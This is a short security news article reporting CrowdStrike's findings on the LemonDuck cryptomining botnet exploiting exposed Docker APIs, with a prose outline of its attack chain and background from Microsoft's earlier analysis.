LemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to mine cryptocurrency on Linux systems as part of an active malware campaign.
“It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses,” CrowdStrike said in a new report. “It evades detection by targeting Alibaba Cloud’s monitoring service and disabling it.”
Known to strike both Windows and Linux environments, LemonDuck is primarily engineered for abusing the system resources to mine Monero. But it’s also capable of credential theft, lateral movement, and facilitating the deployment of additional payloads for follow-on activities.
“It uses a wide range of spreading mechanisms — phishing emails, exploits, USB devices, brute force, among others — and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns,” Microsoft detailed in a technical write-up of the malware last July.
In early 2021, attack chains involving LemonDuck leveraged the then newly patched Exchange Server vulnerabilities to gain access to outdated Windows machines, before downloading backdoors and information stealers, including Ramnit.
The latest campaign spotted by CrowdStrike takes advantage of exposed Docker APIs as an initial access vector, using it to run a rogue container to retrieve a Bash shell script file that’s disguised as a harmless PNG image file from a remote server.
An analysis of historical data shows that similar image file droppers hosted on LemonDuck-associated domains have been put to use by the threat actor since at least January 2021, the cybersecurity firm noted.
The dropper files are key to launching the attack, with the shell script downloading the actual payload that then kills competing processes, disables Alibaba Cloud’s monitoring services, and finally downloads and runs the XMRig coin miner.
With compromised cloud instances becoming a hotbed for illicit cryptocurrency mining activities, the findings underscore the need to secure containers from potential risks throughout the software supply chain. Read more: https://bit.ly/3vIDXms
You can also read this: Justice Department Appoints First Director of National Cryptocurrency Enforcement Team